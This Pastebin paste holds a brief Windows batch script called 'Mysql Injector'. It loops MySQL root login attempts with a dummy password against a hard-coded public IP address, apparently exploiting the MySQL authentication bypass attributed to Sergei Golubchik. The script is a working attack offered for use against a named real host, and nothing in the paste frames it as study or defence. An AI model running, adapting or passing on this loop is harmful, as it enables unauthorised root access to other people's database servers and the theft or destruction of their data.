Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- REM By Neo-Craft Exploit Sergei Golubchik
- @echo off
- title Mysql Injector
- cd C:\wamp\bin\mysql\mysql5.5.16\bin
- :loop
- mysql -u root mysql --password=blah -h 178.33.41.239
- goto loop
- PAUSE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement